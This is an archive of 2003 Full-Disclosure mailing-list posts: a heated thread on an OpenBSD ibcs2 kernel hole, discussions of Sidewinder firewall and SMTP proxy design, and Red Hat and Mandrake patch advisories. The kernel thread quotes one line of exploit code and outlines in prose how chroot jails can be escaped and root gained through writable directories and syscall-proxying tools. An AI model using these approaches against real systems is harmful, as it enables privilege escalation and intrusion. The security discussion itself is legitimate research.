if((fd = open(./ibcs2own, O_CREAT^O_RDWR, 0755)) 0) {
How on earth is this going to work against privilege separation ? In each
sane setup, a server process is chrooted to a directory with no writable
directories.
noir so i hope, some of you openbsd loving losers will finally get the truth
noir behind your cult. it is a big LIE, aloha
Being not a diehard obsd fan, I must notice that 3.4 kernel is built with
stack smashing protection, which reduces this hole to pure local DoS only. Can
you name any other OS which has any prevention against kernel buffer overflow ?
Yes, this bug is hopeless, but stay objective.
peace,
algo
pgp0.pgp
Description: PGP signature
Re: [Full-Disclosure] Re: yet another OpenBSD kernel hole ...
Hi! noir so i hope, some of you openbsd loving losers will finally get the truth noir behind your cult. it is a big LIE, aloha Being not a diehard obsd fan, I must notice that 3.4 kernel is built with stack smashing protection, which reduces this hole to pure local DoS only. _IF_ the stack smashing protection works it will reduce this bug into a pure local DoS yes. I have seen no proof so far that the SSP stack smashing protection is 100% effective against all types of overflows. Can you name any other OS which has any prevention against kernel buffer overflow ? The Adamantix kernels are compiled with SSP (aka propolice), which is the same thing used to compile the OpenBSD kernel. It protects against some, but not all, overflows. Groetjes, Peter Busser -- The Adamantix Project Taking high-security Linux out of the labs, and into the real world http://www.adamantix.org/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
On Tue, Nov 18, 2003 at 02:50:13PM -0500, [EMAIL PROTECTED] wrote: Testing can prove the presence of flaws, but not their absence -- Dijkstra. The same exact logic of why a crypto challenge doesn't prove anything applies to a firewall challenge as well. Lets take a example. I have firewall A that uses crypto method B. Cryptalanysis against B will not prove that the firewall implemented it properly. On the flip side failing to comprimise the firewall will not prove the method B is sound. The logic maybe the same but the implementation of the logic is diffrent. The reasons that were mentioned in the article applies to crypto far more than vulndev of products. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: yet another OpenBSD kernel hole ...
Your code does:
if((fd = open(./ibcs2own, O_CREAT^O_RDWR, 0755)) 0) {
How on earth is this going to work against privilege separation ? In each
sane setup, a server process is chrooted to a directory with no writable
directories.
do you have any idea how many of those chrooted processes have temporary
directories in their chroot environment ? many of the so called priv
seperated processes use temoprary files thus having writeable directories
in there chroot jail. you might have heard the concept called system
call/API proxying, you can upload the ibcs2own binary and simulate this
exploit as if you run it from a shell, not rocket since simple and
straight forward ...
Being not a diehard obsd fan, I must notice that 3.4 kernel is built with
stack smashing protection, which reduces this hole to pure local DoS only. Can
you name any other OS which has any prevention against kernel buffer overflow ?
i can name OSes which do not have these kind of hopeless, amateur bugs.
just a reminder that propolice protects against stack smashing not heap
smashing so it would be a joke to claim prevention against kernel buffer
overflow because it simply DO NOT. there are tons of kmem alloctor
overflows in OpenBSD, go figure ;-) ...
regards,
- noir
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: yet another OpenBSD kernel hole ...
On Tue, Nov 18, 2003 at 04:13:24PM -0500, [EMAIL PROTECTED] wrote:
Your code does:
if((fd = open(./ibcs2own, O_CREAT^O_RDWR, 0755)) 0) {
How on earth is this going to work against privilege separation ? In each
sane setup, a server process is chrooted to a directory with no writable
directories.
do you have any idea how many of those chrooted processes have temporary
directories in their chroot environment ? many of the so called priv
seperated processes use temoprary files thus having writeable directories
in there chroot jail.
I can think of only one - named, it has a writable /var/named/slave, and it
is an exception. Anyway, this is a reminder to mount /var partition
as noexec,nosuid.
Of course, there are other useful things you can do in a chroot jail, and
there are methods to prevent you from doing them, but let's not beat this
dead cow once again.
BTW, what is /var/empty/dev/log left for (on obsd 3.4) ? Syslogd should not
need it. Irrelevant in this case.
you might have heard the concept called system
call/API proxying, you can upload the ibcs2own binary and simulate this
exploit as if you run it from a shell, not rocket since simple and
straight forward ...
What does syscall forwarding add to the discussion ? It is only a tool. If
you can create a binary and execute it, you can exploit this bug with or
without syscall forwarding.
Not to mention that Impurity is a superior tool on Unices.
Being not a diehard obsd fan, I must notice that 3.4 kernel is built with
stack smashing protection, which reduces this hole to pure local DoS only. Can
you name any other OS which has any prevention against kernel buffer overflow ?
i can name OSes which do not have these kind of hopeless, amateur bugs.
just a reminder that propolice protects against stack smashing not heap
smashing so it would be a joke to claim prevention against kernel buffer
overflow because it simply DO NOT. there are tons of kmem alloctor
overflows in OpenBSD, go figure ;-) ...
Right, I should have put it against stack kernel overflows (BTW I did not
say all kernel buffer overflows). Anyway, I wonder if you have any technique
to genericly exploit heap overflow in kernel land; you have promised in p60-6
to post one :)
peace,
algo
pgp0.pgp
Description: PGP signature
[Full-Disclosure] Re: Sidewinder G2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Shawn McMahon wrote: Daniel Sichel wrote: Host the DNS and sendmail servers directly on your firewall. The operating system should be better protected against a wide-range of exploits. Implementing two of the most common targets of exploit sort of eliminates the usefulness of that better protection. Any application proxy firewall is going to face some of these issues. I do agree 100% that I personally would be more comfortable with a application proxy firewall product like Sidewinder if they implemented DNS and SMTP using secure-by-design services rather than using hardened BIND and hardened Sendmail on a secure BSDI-based OS. Return their product and get your money back. Secure Computing claims that their SecureOS with type-enforcement and other service protection is not vulnerable to the exploits against BIND and Sendmail, and as such, it is more secure than punching holes in your firewall and passing the traffic to internal hosts running vulnerable versions of BIND and Sendmail. I'm not suggesting that SCC is correct in their defense against this claim, but they do have a point. Personally, I would prefer to run a caching DNS service (DJB dnscache, chrooted) on OpenBSD as an edge firewall, both to offer some protection to internal DNS clients, and also to enhance proxy performance on the firewall itself (by caching DNS results locally). Unfortunately, there are no commercial products implementing this combination, and when you're working with major corporations, a home-brew design built on Open Source components is a tough sell. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAj+6hjkACgkQKo6Jkwn+K0hOegCfT4uFSGvIBLla4mF4+q8hlzxK0msA n0DOhRJXFagc2ZxZ1m9h5TU1srXS =X8F9 -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messengerl=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliatel=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: yet another OpenBSD kernel hole ...
I can think of only one - named, it has a writable /var/named/slave, and it is an exception. Anyway, this is a reminder to mount /var partition as noexec,nosuid. there is anonymous ftp and sftp assuming incoming/ directories. how about sendmail ? and many similar MTAs. Also bugs like select() does not require any writable directory so wrapping the select-alike exploits with MOSDEF or your Impurity will break chroot, get root and spanwn a shell if you like ... ; Of course, there are other useful things you can do in a chroot jail, and there are methods to prevent you from doing them, but let's not beat this dead cow once again. yep, there are other public and unpublic techniques to break chroot other than kernel overflows. once you gain execution, chroot slightly raises the bar but does not prevent successful exploitation. What does syscall forwarding add to the discussion ? It is only a tool. If you can create a binary and execute it, you can exploit this bug with or without syscall forwarding. Not to mention that Impurity is a superior tool on Unices. syscall forwarding makes life simpler in uploading/downloading and executing remote binaries, nothing more. there are definetely better solutions like MOSDEF and Impurity which allow you to do even more complex stuff in a remote exploitation context, such as kernel exploits ... Right, I should have put it against stack kernel overflows (BTW I did not say all kernel buffer overflows). Anyway, I wonder if you have any technique to genericly exploit heap overflow in kernel land; you have promised in p60-6 to post one :) as i claimed in p60-6 and recently in bugtraq ( http://www.securityfocus.com/archive/1/344889/2003-11-15/2003-11-21/0 ), yes i got working technique ;) later, - noir ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Sidewinder G2
Two things. The Sidewinder firewall was written before qmail, Postfix or other secure MTA's existed so it used sendmail as the only existing open source MTA at the time. It would be difficult for most of the customers of Sidewinder to convert ot another MTA after depending on sendmail for a long time. This is the main reason it runs sendmail rather than Qmail or Postfix. The Sidewinder OS is one of the most secure there is and achieves good partitoning of processes from each other. It is designed so that one process being hacked (sendmail for instance) will not cause a breach of security for the system. Proxies like sendmail do not run as root (since it does not deliver mail to any account on the Sidewinder itself) so anyone hacking them gains no further access. This is why it is safer to run it on the Sidewinder rather than a less secure OS like Linux or Solaris. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Daniel Sichel Sent: November 17, 2003 2:55 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Sidewinder G2 Thanks for the input I have received on safe configurations for the Sidewinder G2. After reading all the responses which pretty universally confirmed my instinct that it would be less than clever to have sendmail running on a firewall, I began to doubt that I had heard the tech guy who recommended it correctly. So I checked the manual which recommends as most secure the following... Host the DNS and sendmail servers directly on your firewall. The operating system should be better protected against a wide-range of exploits. PlanningGD.PDF from Secure Computing. This represents a very different approach than what was suggested here. Any ideas why? Who is right? BTW, I hope I haven't broken any intellectual property (the other ugly IP in our little world) laws by reproducing the quote from the manual. If so I apologize and plead ignorance. It is reporduced here ONLY for educational purposes. Dan Sichel, Network Engineer Ponderosa Telephone Company (559) 868-6367 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [RHSA-2003:288-01] Updated XFree86 packages provide security and bug fixes
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Red Hat Security Advisory Synopsis: Updated XFree86 packages provide security and bug fixes Advisory ID: RHSA-2003:288-01 Issue date:2003-11-17 Updated on:2003-11-17 Product: Red Hat Linux Keywords: Cross references: Obsoletes: CVE Names: CAN-2003-0690 CAN-2003-0692 CAN-2003-0730 - - 1. Topic: Updated XFree86 packages for Red Hat Linux 9 provide security fixes to font libraries and XDM. 2. Relevant releases/architectures: Red Hat Linux 9 - i386 3. Problem description: XFree86 is an implementation of the X Window System providing the core graphical user interface and video drivers in Red Hat Linux. XDM is the X display manager. Multiple integer overflows in the transfer and enumeration of font libraries in XFree86 allow local or remote attackers to cause a denial of service or execute arbitrary code via heap-based and stack-based buffer overflow attacks. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0730 to this issue. The risk to users from this vulnerability is limited because only clients can be affected by these bugs, however in some (non-default) configurations, both xfs and the X Server can act as clients to remote font servers. XDM does not verify whether the pam_setcred function call succeeds, which may allow attackers to gain root privileges by triggering error conditions within PAM modules, as demonstrated in certain configurations of the pam_krb5 module. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0690 to this issue. XDM uses a weak session cookie generation algorithm that does not provide 128 bits of entropy, which allows attackers to guess session cookies via brute force methods and gain access to the user session. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0692 to this issue. Users are advised to upgrade to these updated XFree86 4.3.0 packages, which contain backported security patches and are not vulnerable to these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command: up2date This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. If up2date fails to connect to Red Hat Network due to SSL Certificate Errors, you need to install a version of the up2date client with an updated certificate. The latest version of up2date is available from the Red Hat FTP site and may also be downloaded directly from the RHN website: https://rhn.redhat.com/help/latest-up2date.pxt 5. RPMs required: Red Hat Linux 9: SRPMS: ftp://updates.redhat.com/9/en/os/SRPMS/XFree86-4.3.0-2.90.43.src.rpm i386: ftp://updates.redhat.com/9/en/os/i386/XFree86-100dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-75dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-14-100dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-14-75dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-15-100dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-15-75dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-2-100dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-2-75dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-9-100dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-ISO8859-9-75dpi-fonts-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-Mesa-libGL-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-Mesa-libGLU-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-Xnest-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-Xvfb-4.3.0-2.90.43.i386.rpm ftp://updates.redhat.com/9/en/os/i386/XFree86-base-fonts-4.3.0-2.90.43.i386.rpm
Re: [Full-Disclosure] Sidewinder G2
Thank you -- that is exactly what I meant. Michael. On Tue, 18 Nov 2003 16:07:58 - Patrick Doyle [EMAIL PROTECTED] wrote: I think Michael was talking about having a sendmail service running on a firewall, and not a mail guard feature which the Cisco Pix has, which is supposed to limit SMTP commands to a specified minimum set of commands. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of [EMAIL PROTECTED] Sent: 18 November 2003 14:54 To: Michael Gale Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sidewinder G2 On Mon, 17 Nov 2003 15:44:01 MST, Michael Gale [EMAIL PROTECTED] said: I believe two of the most secure firewalls are Cisco Pix and the BorderWare Firewall. Cisco does not offer any services and Borderware offers a few for small business and are very restrictive. For a machine that doesn't have any services, the Cisco PIX is infamous for breaking SMTP. Google for 'cisco pix smtp' and let me know if you still think the PIX doesn't have services on it. BBCi at http://www.bbc.co.uk/ This e-mail (and any attachments) is confidential and may contain personal views which are not the views of the BBC unless specifically stated. If you have received it in error, please delete it from your system. Do not use, copy or disclose the information in any way nor act in reliance on it and notify the sender immediately. Please note that the BBC monitors e-mails sent or received. Further communication will signify your consent to this. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sidewinder G2
On Tue, 18 Nov 2003 12:26:36 EST, David Maynor said: I think that may be a bad example as that talks about crypto challenges as oppsoed to operational security products. There is a big diffrence in cryptanalysis and bug hunting in firewalls. Testing can prove the presence of flaws, but not their absence -- Dijkstra. The same exact logic of why a crypto challenge doesn't prove anything applies to a firewall challenge as well. pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] Sidewinder G2
This seems to be a standard for SMTP application layer proxies --- on the firewalls I have used in the past. Security works best in layers :) Michael On Tue, 18 Nov 2003 12:16:31 -0500 [EMAIL PROTECTED] wrote: On Tue, 18 Nov 2003 10:52:29 CST, Perrymon, Josh L. said: So it's a packet filter with application inspection... right..?? It gave up any right to claim that when it gave its own 220 banner rather than the banner of the actual destination it was filtering for. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MDKSA-2003:107 - Updated glibc packagess fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrake Linux Security Update Advisory ___ Package name: glibc Advisory ID:MDKSA-2003:107 Date: November 18th, 2003 Affected versions: 9.0, 9.1, Corporate Server 2.1, Multi Network Firewall 8.2 __ Problem Description: A bug was discovered in the getgrouplist function in glibc that can cause a buffer overflow if the size of the group list is too small to hold all the user's groups. This overflow can cause segementation faults in various user applications, some of which may lead to additional security problems. The problem can only be triggered if the user is in a larger number of groups than expected by an application. The provided packages are patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0689 __ Updated Packages: Corporate Server 2.1: a75afbeab6bb0af8312606a5206b649f corporate/2.1/RPMS/glibc-2.2.5-16.3.C21mdk.i586.rpm 0728825f51c3bbdd93c8f2573927c035 corporate/2.1/RPMS/glibc-devel-2.2.5-16.3.C21mdk.i586.rpm cb76d0a10f88a3194023065888e16a9e corporate/2.1/RPMS/glibc-i18ndata-2.2.5-16.3.C21mdk.i586.rpm 904f109cf66575c2eaa8e15a6f1ddee1 corporate/2.1/RPMS/glibc-profile-2.2.5-16.3.C21mdk.i586.rpm 007307c4d8a271f72a97fc97f7303ff5 corporate/2.1/RPMS/glibc-static-devel-2.2.5-16.3.C21mdk.i586.rpm 4c8a57e8fdc3acefb8daa6eeda23ba70 corporate/2.1/RPMS/glibc-utils-2.2.5-16.3.C21mdk.i586.rpm 76efd47f25ba60c9bbc567668a38e4ff corporate/2.1/RPMS/ldconfig-2.2.5-16.3.C21mdk.i586.rpm efd517e924eb066acd0856bb476f87af corporate/2.1/RPMS/nscd-2.2.5-16.3.C21mdk.i586.rpm 7c062ed74887835eba2f1a50a265b8c9 corporate/2.1/RPMS/timezone-2.2.5-16.3.C21mdk.i586.rpm 61f2d1b5fe0bc03cb0af9ef086c667bb corporate/2.1/SRPMS/glibc-2.2.5-16.3.C21mdk.src.rpm Corporate Server 2.1/x86_64: 5aae39182bab1d726180953a7cd8d792 x86_64/corporate/2.1/RPMS/glibc-2.2.5-28.1.C21mdk.x86_64.rpm d3486ac35ba3d078e737be31113475f0 x86_64/corporate/2.1/RPMS/glibc-debug-2.2.5-28.1.C21mdk.x86_64.rpm 939043df28c991d7b37b33fef3d0feb2 x86_64/corporate/2.1/RPMS/glibc-devel-2.2.5-28.1.C21mdk.x86_64.rpm c1b184cb452e4d60f268a4fc5f48e174 x86_64/corporate/2.1/RPMS/glibc-i18ndata-2.2.5-28.1.C21mdk.x86_64.rpm f2777101e2778fe7de39673220d7a069 x86_64/corporate/2.1/RPMS/glibc-profile-2.2.5-28.1.C21mdk.x86_64.rpm b2d191df43537f5f8e2e100b1de072ed x86_64/corporate/2.1/RPMS/glibc-static-devel-2.2.5-28.1.C21mdk.x86_64.rpm 083d9e44ce870e0d0ba2cea4c67963ec x86_64/corporate/2.1/RPMS/glibc-utils-2.2.5-28.1.C21mdk.x86_64.rpm 0e6f3655b336442eb80847d1e2be858a x86_64/corporate/2.1/RPMS/ldconfig-2.2.5-28.1.C21mdk.x86_64.rpm 059c6093ad5916e48a8786211a7ece0a x86_64/corporate/2.1/RPMS/nscd-2.2.5-28.1.C21mdk.x86_64.rpm e0a23600cbd0ceb7a44fd4e275b4f454 x86_64/corporate/2.1/RPMS/timezone-2.2.5-28.1.C21mdk.x86_64.rpm c4de027516cfb1c943656f3876c89c44 x86_64/corporate/2.1/SRPMS/glibc-2.2.5-28.1.C21mdk.src.rpm Mandrake Linux 9.0: e64b4f099e7cd715c5ff1fc895101821 9.0/RPMS/glibc-2.2.5-16.3.90mdk.i586.rpm 48a4f54fc49c39306a002633ae4495af 9.0/RPMS/glibc-devel-2.2.5-16.3.90mdk.i586.rpm 9db7115962de7c0680ce0de12ea1955c 9.0/RPMS/glibc-i18ndata-2.2.5-16.3.90mdk.i586.rpm c5fed843eb910c860e3af39e6583e3bb 9.0/RPMS/glibc-profile-2.2.5-16.3.90mdk.i586.rpm 2608fa069dfd563541f018742310d7b0 9.0/RPMS/glibc-static-devel-2.2.5-16.3.90mdk.i586.rpm 101574c95eeb7e8849f9ef0010afdec4 9.0/RPMS/glibc-utils-2.2.5-16.3.90mdk.i586.rpm 9c809b34abce979ef8cc2dea06a4b025 9.0/RPMS/ldconfig-2.2.5-16.3.90mdk.i586.rpm 2b04e51c90b79235ccfe673b123fbb9c 9.0/RPMS/nscd-2.2.5-16.3.90mdk.i586.rpm 386ac1d7f745c8deb1d3346cf86f7b51 9.0/RPMS/timezone-2.2.5-16.3.90mdk.i586.rpm 434a57fb27d0d12337bc579eaf89d1db 9.0/SRPMS/glibc-2.2.5-16.3.90mdk.src.rpm Mandrake Linux 9.1: 14b04c0c5abfcdeeb7ddcd99dff6f59c 9.1/RPMS/glibc-2.3.1-10.1.91mdk.i586.rpm db0399ed5e4e5932ccd68eb1d971e918 9.1/RPMS/glibc-debug-2.3.1-10.1.91mdk.i586.rpm 55e698783b2f00d56e74a6a0295ddc65 9.1/RPMS/glibc-devel-2.3.1-10.1.91mdk.i586.rpm 8d794fa39d989aff297eecddf8f3a89a 9.1/RPMS/glibc-i18ndata-2.3.1-10.1.91mdk.i586.rpm 28000c25d34f6b6136092840825009a8 9.1/RPMS/glibc-profile-2.3.1-10.1.91mdk.i586.rpm 2fd232922ed61aba14ca2da29948bfa5 9.1/RPMS/glibc-static-devel-2.3.1-10.1.91mdk.i586.rpm 93c16beb43e79147b89d89dc080dcc3c 9.1/RPMS/glibc-utils-2.3.1-10.1.91mdk.i586.rpm dde039c956d163bfd0d58729765acc0d 9.1/RPMS/ldconfig-2.3.1-10.1.91mdk.i586.rpm c4a00854f69004fdc8875ceae2a23cab 9.1/RPMS/nscd-2.3.1-10.1.91mdk.i586.rpm
Re: [Full-Disclosure] Sidewinder G2
On Tue, 18 Nov 2003 14:49:14 MST, you said: So if you have a HTTP application level proxy does that mean you are running a webserver ? Please read RFC821 and/or 2821. 'SMTP Server' basically refers to *anything* that's the server end of an SMTP conversation (RFC2821, section 2.1): An SMTP server may be either the ultimate destination or an intermediate relay (that is, it may assume the role of an SMTP client after receiving the message) or gateway (that is, it may transport the message further using some protocol other than SMTP). SMTP commands are generated by the SMTP client and sent to the SMTP server. SMTP replies are sent from the SMTP server to the SMTP client in response to the commands. Also, RFC2616 says this about HTTP proxies in section 1.3: proxy An intermediary program which acts as both a server and a client for the purpose of making requests on behalf of other clients. Requests are serviced internally or by passing them on, with possible translation, to other servers. A proxy MUST implement both the client and server requirements of this specification. A So yes, if you're running a proxy, it *MUST* function as a server. pgp0.pgp Description: PGP signature
